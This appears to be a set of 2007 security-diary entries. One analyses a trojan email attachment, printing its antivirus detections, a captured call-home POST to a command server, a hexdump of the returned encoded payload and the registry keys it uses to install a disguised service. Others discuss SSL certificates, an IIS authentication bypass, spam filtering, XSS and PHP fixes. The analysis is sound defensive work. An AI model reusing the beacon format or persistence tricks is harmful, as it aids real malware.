Attachments include names such as "<news organization>-news<digits>.zip"

At the moment AV coverage (of the uncompressed file) is spotty

File size: 40960 bytes
MD5: efff306b3296b18a94fea8491b960ab0
SHA1: 11afce9edf86386f0383bd162cff428a7fdf27bd
packers: UPX
AhnLab-V3 2007.5.31.2 06.04.2007 no virus found
AntiVir 06.04.2007 no virus found
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 06.04.2007 Win32:Agent-GPS
AVG 06.03.2007 no virus found
BitDefender 7.2 06.04.2007 no virus found
CAT-QuickHeal 9.00 06.04.2007 no virus found
ClamAV devel-20070416 06.04.2007 no virus found
DrWeb 4.33 06.04.2007 no virus found
eSafe 06.04.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3690 06.04.2007 no virus found
Ewido 4.0 06.04.2007 no virus found
FileAdvisor 1 06.04.2007 no virus found
Fortinet 06.02.2007 suspicious
F-Prot 06.04.2007 no virus found
F-Secure 6.70.13030.0 06.04.2007 no virus found
Ikarus T3.1.1.8 06.04.2007 no virus found
Kaspersky 06.04.2007 no virus found
McAfee 5045 06.04.2007 no virus found
Microsoft 1.2503 06.04.2007 no virus found
NOD32v2 2307 06.04.2007 no virus found
Norman 5.80.02 06.04.2007 no virus found
Panda 06.04.2007 no virus found

The binary once executed appears to callhome via an HTTP POST to at least one of two websites:
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
13749 | | | US | arin | 2000-10-05 | EVERYONES-INTERNET - Everyones Internet
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
21844 | | | US | arin | 2006-02-17 | THEPLANET-AS - THE PLANET

Here are the partially sanitized details from one such call home:

POST /forum.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Accept-Language: en
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=4AFEAB473A5F7
Content-Length: 587

Content-Disposition: form-data; name="sid"
Content-Disposition: form-data; name="up"
Content-Disposition: form-data; name="wbfl"
Content-Disposition: form-data; name="v"
Content-Disposition: form-data; name="ping"
Content-Disposition: form-data; name="guid"
Content-Disposition: form-data; name="wv"

In response to this post the webserver returns a binary file:

HTTP/1.1 200 OK
Date: Mon, 04 Jun 2007 17:22:01 GMT
Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e mod_autoindex_color PHP/5.2.1..X-Powered-By: PHP/5.2.1
Content-Length: 260
Connection: close
Content-Type: multipart/form-data; boundary="4AFEAB473A5F7"

Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
0d0a 2768 727f 252d 2e2d 2a2e 2928 2c2a ..'hr.%-.-*.)(,*
2a22 2b28 292d 2a27 3468 727f 2511 2779 *"+()-*'4hr.%.'y
7774 7870 2511 276d 2511 292f 2b11 2734 wtxp%.'m%.)/+.'4
6d25 1127 6825 112c 2f35 2e29 352c 2935 m%.'h%.,/5.)5,)5
2e23 2123 2b16 1129 2a2d 352f 2b35 292b .#!#+..)*-5/+5)+
2f35 2a2b 2d21 232b 1127 3468 2511 2734 /5*+-!#+.'4h%.'4
7977 7478 7025 ywtxp%

I have included the hexdump of COMMON.BIN unsanitized above for anyone wanting to take it apart (and please submit your analysis to our contact page if you would).
Possibly an encoded config file.

Here are the system modification details:
Creates file C:\WINDOWS\ws386.ini.
Creates file C:\WINDOWS\s32.txt.
Creates key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "ImagePath"="C:\WINDOWS\SYSTEM\aspimgr.exe" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Sets value "DisplayName"="Microsoft ASPI Manager" in key "HKLM\System\CurrentControlSet\Services\aspimgr".
Creates key "HKLM\Software\Microsoft\Sft".
Sets value "default"="{00000000-0000-0000-0000-00003F000F00}" in key "HKLM\Software\Microsoft\Sft".

In addition to our readers that submitted information I'd also like to thank the excellent analysis results from Anubis, Norman, and Sunbelt


Published: 2007-06-03

Invalid ssl certs ...

We all know them: invalid ssl certs. But how bad are they? And what can we do to improve the situation?


Basically the users are a weak link in multiple directions. If we teach users that ssl certs that are bad are OK to accept and continue as if nothing is wrong, we are taking away all their defense against man in the middle attacks.

Equally we allow our users to accept and continue interacting with websites that by providing an invalid certificate actually proofed there is something wrong with them.

We should get to a situation where we can teach our users in awareness sessions to *never* to accept a ssl cert that is apparently bad.

In order to get there, we need to make sure we get good certificates signed by a recognized CA in all our uses of ssl certs such as our websites. One of the things to do is to take care with "temporary" setups and to make sure we are proactive in renewing certificates.

Is your calendar marked to renew your certs?
Do you know when they will expire?

Man in the middle

Man in the middle attacks on ssl enhanced connections are actually prevented by having the certificates and the ability to verify them. The security is for a large part centered in the procedures used by the certificate authorities (CA) you accept to use.

As long as we cannot teach or prevent users from accepting bad certificates, we will always loose this fight. Phishers and the like can work through ssl+strong authentication if we let our users fall prey to man in the middle attacks.

Do you teach your users the hazards of bad certificates?

Self-signed certificates

Self signed certificates, having no recognized CA signing them, aren't by definition bad. They however complicate things: Users should verify the certificate before accepting it. Such verification can be done using a fingerprint and an out of band communication. As this means additional work, one would expect the use of a recognized CA is simpler, still one finds these often.

If you use self-signed certificates, make sure you know how your users will (or will not) deal with it, make sure to setup that out of band verification and make sure that you have the right reason to do this. If you use a PKI infrastructure, make sure all users have your root certificates as needed so they do not get errors.

If you have self-signed certificates, how many times do you get called for verifying the fingerprint(s)?


A certificate authority should have very strict procedures to verify you are who you claim to be before signing your public key. There have been a few problems in the past with reputable companies e.g. signing certificates claiming to belong to a well known software vendor. So these procedures are not foolproof. That's why there are revocation lists, unfortunately many clients neglect to verify those lists.

Not all of the CAs use the same procedures to verify who's certificate they sign, choosing it right is key: you want as many as possible of the others to recognize the CA as bing a good and reputable company with strict rules, but you want them to be flexible enough that -esp. hen they are located in another country- are possible to work with and actually have procedures where you can jump through their hoops.

Do you know what CAs are out there? What the strength of their procedures is?
How was your CA selected ?
Bo you know what CAs are in your browser?

Browser makers

Most of us think of the users as the weakest links, but honestly, the browsers the users use are the weakest link in reality. They simply lack all backbone in preventing the users from hurting themselves.

Doesn't you car make an annoying noise when you do not wear your seatbelt while driving it?

Then why does your browser only need an obscure "next" to proceed on to a website that has a bad cert ? Why not:

  • Prevent access to websites with bad ssl certs (the site basically proofed it isn't who it claims to be!), putting the burden of having right certificates with the website owners.
  • Show a red overlay on every pageload/refresh warning the user the site is not to be trusted
  • Not to allow use of forms to send data to a https site that has a bad cert
  • Not to load images, scripts, ... from such sites
  • ...

And as far as bad certificates go, how about telling the user what is wrong with the certificate in understandable language. While at it, make the text there easy to cut and paste so users can talk with the administrators.

While this might seen hard to sell to consumers, I'm not sure it would be that hard to sell to administrators in a company wanting to step up security a notch or two.

Since browser makers also choose for most of the world what CAs are trusted and what not, how about making that choice a bit more under the control of the administrators of the computer ?  E.g. if you delete a CAs root cert, how about not adding it again at every patch, making the admin redo the thing over and over.

Did you think of the impact of users switching browsers on the list of CAs they trust?


I think we need to eradicate bad certificates on all of our websites. Next, teach our users significant better habits and start by increasingly making those bad habits harder to have in the browsers we let our users use.

Swa Frantzen -- NET2S


Published: 2007-06-03

IIS 5.0 authentication bypass exploit -- CVE-2007-2815

David wrote in pointing us to an exploit against IIS 5.0 and 5.1 . The exploit was discovered on December 15, 2006, and made public since the end of May 2007. The design of IIS 5.x allows to bypass basic authentication by using the hit highlight feature.

Microsoft's response seems to be a bit atypical for them as it includes a section on how to reproduce the exploit. In other words: Microsoft is telling the world how to exploit their products being used by their customers. Not that the worst of those interested in it did not already know, but the one thing we need from Microsoft is not the exploit, but the patch or at least a decent work-around. And that patch is lacking. Their only defensive advice is to upgrade to IIS 6.0.

Since this means that you would also need to upgrade the windows 2000 or XP to Windows 2003, and that such an upgrade isn't free, nor easy. So what do we do when Microsoft does not give any advice but to upgrade to IIS 6.0 ?  Let's look at alternatives.

Feel free to write in if you know more effective alternatives:

  • Most probably there is a way to remove something or change some registry setting to prevent this, unfortunately exactly what is neither documented nor validated.
    Eric told us to "If you don't use the web hits functionality, a simple workaround would be to remove the script mapping for .htw files". Without a script mapping, IIS should treat the file as static content.
  • Try to use application level firewalls (filters), while they aren't the easiest to configure considering all the ways URLs can be encoded, it's something that might help for a while, but getting it fully right will be a pain. If you have the infrastructure it can be a temporary measure till you can upgrade IIS, solving the actual problem.
  • URLScan, a URL filter by Microsoft actually can be used to stop access to .htw files and is reported by some readers as being effective. While a URL scanner inside the web browser might know all possible encodings, it remains the poor man choice, but most likely good enough as a workaround in the short run provided you do not need .htw functionality.
  • A number of readers who are preventing access to files by managing rights on the confidential files or directories themselves. To people used to apache this sounds odd, but IIS uses OS level users and therefore the permissions set in the filesystem can be used to limit rights and it will protect against server side scripts walking the documentroot tree as well.
  • Upgrade to apache or another web server, with or without a (cross) upgrade of the OS.
  • Scramble an upgrade to Windows 2003, potentially on more potent hardware.

Some URLs:

While the public exploits seem to focus on leaking protected information, the ability to execute code is unexplored, but hinted about.

Unlike my normal habit of avoiding to broadcast exploitable information, but since Microsoft themselves are telling the world already, take a look in your IIS logs for hits like:


Don't be blindsided if you do not find "null.htw" in your document root directory, the exploit does not need that file at all, in fact the reference needs to be to a file that does not exist, but since it can be located anywhere, that's not a working workaround either.

The one workaround that seems to be functioning is to install and configure -if not done so already- URLScan. Andrew wrote in with: "use URLScan to block all requests for htw files (or, better yet, set URLScan never to permit requests for any extensions but ones you know you need)". URLScan as a workaround remains an ugly solution as it uses filtering as an afterthought instead of proper security by design, but then again, not that many web servers come with security as one of the very top requirements.

A reader pointed us to Aqtronix Webknight as an alternative URL filter that could help stop the exploits agaisnt IIS (GNU licensed).

Swa Frantzen -- NET2S


Published: 2007-06-02

p0f, spam detection and OOF e-mails

I have no doubt that all our readers are struggling in the everlasting race between spammers and spam detection applications. Actually, I don’t know almost anyone who isn’t running at least one tool that helps him detect spam.

I’ve been a happy user of amavisd-new (http://www.ijs.si/software/amavisd) for a long time. Amavisd-new is actually only a framework and allows you to use almost anything – by default it will use the most popular anti-spam tool, SpamAssassin, but it is very easy to use other tools such as DSPAM. Amavisd-new’s flexibility is its most powerful weapon.

Analyzing network traffic to detect spam

One extremely cool plugin that Mark wrote is p0f-analyzer.pl (http://www.ijs.si/software/p0f-analyzer.pl). This is a simple service that can be used with p0f, the famous passive fingerprinting utility.

So how does this help us with spam detection you might ask? First of all, let’s see what p0f-analyzer does. p0f-analyzer has to be run on your e-mail gateway and requires a p0f binary. It will use p0f’s output to create a local cache of all incoming TCP sessions for a limited time. Amavisd-new can be now configured to use p0f-analyzer in order to determine the operating system of the remote client. Finally, you can add additional rules for SpamAssassin (X-Amavis-OS-Fingerprint) that will trigger when certain OS has been detected on the remote client. So why is this good? Well, now we can add a positive score (moving the e-mail closer to being detected as spam) if the remote client is, for example, running Windows 98 – how many servers do you know running on this (unsupported) operating system?

If you’re interested in playing with this, read amavisd-new’s release notes (search for p0f to find how to install and configure this). Just a word of caution – be sure to properly configure amavisd-new so you don’t end up penalizing your own Windows clients!).

Dealing with backscatter OOF e-mails

I recently had to write a very simple plugin that detected e-mail messages with the subject of “Out of Office AutoReply: ***SPAM***”. Can you guess what this is?

If you thought about Exchange you were right. As you probably know, SpamAssassin marks e-mails detected as spam with ***SPAM*** in the header. As business users almost always demand that out of office replies are working even outside your organization, this (with Exchange) inevitably leads to backscatter e-mails produced by your own network. As far as I know, it’s impossible to tell Exchange to drop e-mails marked with ***SPAM*** in the header *before* it uses the OOF module. In other words, you end up sending OOF messages to innocent senders – those addresses are almost always spoofed. So, I ended with a small plugin that detects such e-mails and drops them (actually marks them as infected).

If you want to take a look at the plugin, you can get it here - be careful with it and use it at your own risk, of course (it’s been working fine for me for couple of months already). The plugin is, as you will see, extremely simple and so far it never had a false positive (in order to produce a false positive, one of our users would have to send an e-mail with the subject above – hardly likely).

Once you have it working properly, it will generate logs such as this one:

Jun 2 00:00:00 larry amavis[15399]: (15399-13) Blocked INFECTED (OOF-REPLY), [INTERNAL_IP] [INTERNAL_IP] <internal@user.local> -> <qkep1zcy@chello.com>, quarantine: virus-WkCuYouCzJCS, Message-ID: <1E11F4042C05ED4BAA6BA96319DA566113774068@internal.host.local>, mail_id: WkCuYouCzJCS, Hits: -, size: 1243, Subject: "Out of Office AutoReply: ***SPAM*** Over 1000+ models branded watches to choose, from Swiss Rolex, Patek Philippe, Panerai, Omega & ... yn", 102 ms

You can see that amavisd-new nicely blocked this e-mail (and helped in reducing the amount of backscatter in the world for at least 1 e-mail).



Published: 2007-06-01

Massive list of compromised sites

Our first e-mail this morning was from Dave, who informed us about a compromised site ( hxxp://lawfuel. com /show-release.asp?ID=12419 ). Lorna took the lead on investigating the malware on this site, and in the process ended up with two massive lists of other compromised sites.

We haven't checked them all yet (and probably never will...) but I figure its good to push out a list of these sites before its too late on Friday.

For a list of URLs referenced see http://isc.sans.org/diaryimages/hosts20070601.txt


Published: 2007-06-01

Attributing Attacks

Our  reader Dean sent us a screen shot from wireshark, showing a scan for VNC servers from (mail.tehran.agri-jahad.ir). Indeed, this system appears to be a mail server in Iran

220 mail.tehran.agri-jahad.ir Microsoft ESMTP MAIL Service, Version: 6.0.3790.1830 ready at  Fri, 1 Jun 2007 20:54:41 +0330

With all the news about "Russia attacking Estonia", this nicely illustrates the problem in attributing attacks like this. Is the mail server in Iran compromised (my guess)? Who is launching the scan? Is it a random script kiddie, some bot herder, some government? If it is a government, which one?

The packets look the same and there is no way to tell the motivation. Only once your system is compromised, you may be able to figure out why they did it (and I rather skip that step). Honeypots can help, but a more sophisticated attacker would likely realized whats going on. On the other hand, a sophisticated attacker may actually use some simple "script kiddie" tools first, in order to hide out in the noise of bot probes.

One way to figure out what's going on is to check how many others are being "hit" by this same IP address. DShield is your tool to do just that. See http://www.dshield.org/ipinfo.html?ip= and you will find a few thousand other targets got hit by the same IP address. And port 5900 (VNC) appears to be the main attack method used!

(NB: rather then wireshark screen shots, we prefer raw packet captures)


Published: 2007-06-01

Stupid XSS mistake, and why its so hard to write good code

Stefan Esser (www.hardened-php.net) wrote in earlier to let me know about a XSS issue with the search function for the ISC website. Of course, while I respect his opinion and skills very much, I was first a bit sceptically (after all, I am not exactly suffering from low self esteem). However, he was helpful enough to provide a sample URL showing the problem.

So what happened and why? After all, I keep always saying that a web sites search function is the first spot to look for XSS.

Its pretty simple (and stupid). I pre-fill the search box with the last term a user searched for. This string is pulled from the users session, and the string is stored on the server. So I figured, I don't need to validate it. However, what I missed was that I didn't validate (Actually "escape" is better) right in the first place :-(.

The interesting part is that this issue hadn't been found before. The part that saved me was probably a generic validation for '<script>' tags that is performed on all user input. So defense in depth did work.

I do typically use a "safe_print" function, which is essentially just "print(htmlentities($string))". But well, I didn't use it in the header as some pages do not include the necessary library (you may call that another mistake. It saves a few CPU cycles and disk reads... but hurts you down the road).

Personally, I find that good code review is probably the hardest problem when it comes to these problems.  You just can't review your own code (at least I can't). If you want to help: much of the ISC code is available via Sourceforge (look for the "DShield" project).


Published: 2007-06-01

PHP 5.2.3 released

PHP released PHP version 5.2.3.

From the release notes following security improvements have been made:

  • Fixed an integer overflow inside chunk_split() (CVE-2007-2872)
  • Fixed possible infinite loop in imagecreatefrompng. (CVE-2007-2756)
  • Fixed ext/filter Email Validation Vulnerability (CVE-2007-1900)
  • Fixed bug #41492 (open_basedir/safe_mode bypass inside realpath ())
  • Improved fix for CVE-2007-1887 to work with non-bundled sqlite2 lib.
  • Added mysql_set_charset() to allow runtime altering of connection encoding.

Take care with the fixes not listed as security related as there seem to be at least a few of them that are interesting from either a security application point of view, or just from an availability point of view. E.g.:

  • Fixed bug #41353 (crash in openssl_pkcs12_read() on invalid input)
  • Fixed bug #41347 (checkdnsrr() segfaults on empty hostname)

If you are on the 5.2 branch best to upgrade ASAP to 5.2.3 .

While recompiling and testing PHP, consider adding in Suhosin from the hardened PHP project, it'll improve your security stance.

Swa Frantzen -- NET2S